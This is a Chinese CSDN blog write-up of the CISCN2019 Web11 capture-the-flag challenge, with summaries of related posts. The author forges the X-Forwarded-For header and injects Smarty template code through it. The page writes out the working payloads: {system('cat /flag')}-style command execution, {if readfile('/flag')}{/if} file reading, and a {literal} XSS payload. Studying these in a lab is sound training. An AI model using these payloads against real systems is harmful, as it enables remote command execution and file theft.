[CISCN2019 华东南赛区]Web11

最新推荐文章于 2024-05-10 23:14:19 发布
最新推荐文章于 2024-05-10 23:14:19 发布
阅读量235 收藏
点赞数
分类专栏: CTF题目(web)
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_52907838/article/details/119253980
版权
"本文描述了一次通过发现X-Forwarded-For头部和ssti漏洞进行IP伪造,进而利用Twig类型的SS TI漏洞进行命令执行的过程。在成功执行命令后,遍历了多个目录寻找flag,最终在根目录找到并读取了flag。同时提到了 Smarty 模板引擎的版本信息和可能的其他解题思路,如{if}
摘要由CSDN通过智能技术生成

打开环境:

 发现Build With Smarty !说明应该是与ssti模板注入有关。

 

 发现xff,还有右上角的Current IP:139.205.239.33,就尝试伪造一下IP:

 成功伪造,那就看看xff这个地方有无ssti注入漏洞:

 服务端模板注入攻击

 说明存在ssti注入漏洞,且为twig类型,我们试试能不能命令执行:

 成功执行了,那就简单了,当前目录下有

api
css
index.php
smarty
templates_c
xff
xff

分别读取:X-Forwarded-For:{system(‘cat /api’)}
X-Forwarded-For:{system(‘cat /css’)}
X-Forwarded-For:{system(‘cat /index.php’)}
X-Forwarded-For:{system(‘cat /smarty’)}
X-Forwarded-For:{system(‘cat /templates_c’)}
X-Forwarded-For:{system(‘cat /xff’)}
X-Forwarded-For:{system(‘cat /flag’)}
X-Forwarded-For:{system(‘cat /flag.php’)}

都没发现内容,那就看看根目录:

发现了flag,读取:

另外发现{$smarty.version},返回版本信息3.1.30,if标签能用

smarty中的{if}标签中也可以执行php语句,得flag:{if readfile('/flag')}{/if}

smarty中还有{literal}、{php}(smarty 2可用),试试{literal}或许还有别的解题思路。

{literal}可以让块中间的内容忽略Smarty的解析,paylaod: {literal}alert('xss');{/literal} 可以产生 xss

Kevin_xiao~
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
[CISCN2019 华东赛区]Web11 1(SSTI,smarty,X-Forwarded-For)
weixin_45577185的博客
10-16 420
知识点: SSTI smarty X-Forwarded-For Smarty是一个PHP的模板引擎,提供让程序逻辑与页面显示 (HTML/CSS)代码分离的功能。对于该框架的SSTI漏洞很多 文章往往只是一笔带过,讲解的重心往往在flask等框架上。 看到这个我就想到了抓包修改XFF试试加入X-Forwarded-For 发现Current IP更改为相应值 回想到曾经做过的题,用SSTI 发现存在注入 获取当前目录有那些文件:X-Forwarded-For:{system(‘ls’)}
[CISCN2019 华东赛区]Web11 1
shinygod的博客
03-23 2746
知识点:smart ssti 思路 根据下面的三张图提示,可以看出是smart ssti,在XFF处构造payload,在做题前先了解一下啥是smart。 --------------------------------------------------------------------------------------------------------------- ----------------------------------------------------------------
[CISCN 2019华东]Web11
最新发布
observer的博客
05-10 290
[CISCN 2019华东]Web11
NO.2-29 [CISCN2019 华东赛区]Web11
nigo134的博客
08-03 315
BUUCTF之[CISCN2019 华东赛区]Web11 知识点 SSTI smarty X-Forwarded-For 题目 于是开始BurpSuite抓包和添加X-Forwarded-For:127.0.0.1 emmmmmm其实一开始添加完这个就不知道怎么做了,后来去看了别人的WP有提示SSTI和smarty这两个词。心想,这个不是最近才做过类似的题目嘛。。。哎!我居然没想到! 所以开始尝试一下:X-Forwarded-For:{7*8} 获取当前目录有那些文件:X-Forwarded-.
buuctf-web-[CISCN2019 华东赛区]Web11
weixin_46079186的博客
07-21 147
打开题目, Smarty 猜测应该是模板注入,注入点应该是X-Forwarded-For 传入X-Forwarded-For 验证是否有漏洞 使用命令 找到flag 查看flag 发现没回显 查看源代码拿到flag flag{77f8d94b-c660-47dc-b751-2b749b09143b} ...
web buuctf [CISCN2019 华东赛区]Web11
weixin_44214568的博客
04-07 472
知识点:1.SSTI(smarty模板) 2.XFF 1.开题: a.题目标明smarty,这是用php编写的比较著名的模板引擎,猜测很可能和模板注入有关系 b.提示xff 2.利用bp抓包,添加xff并尝试模板注入 很明显存在SSTI 3.改payload={system('ls')} 分别cat没有flag 猜测可能在目录下面 'cat ../../../flag'(前面有几个../需要挨个试一下) flag{3941b25d-8279-47eb-...
BUUCTF [CISCN2019 华东赛区] Web11
Senimo
12-23 651
BUUCTF [CISCN2019 华东赛区] Web11 考点: 根据页面提示,应该是一个类似IP查询的网站,根据**XXF(X-Forwarded-For)**判断
第六十三题——[CISCN2019 华东赛区]Web11
分享简单的安全技术
05-10 192
题目地址:https://buuoj.cn/challenges 解题思路 第一步:进入题目,看到提示Smarty,猜测使用模板注入漏洞 第二步:构建漏洞 使用burpsuite改包,添加X-Forwarded-For头,X-Forwarded-For:{if phpinfo()}{/if},发现执行了phpinfo() 第三步:获取flag 使用X-Forwarded-For:{if readfile('/flag')}{/if}获取flag ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Kevin_xiao~

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值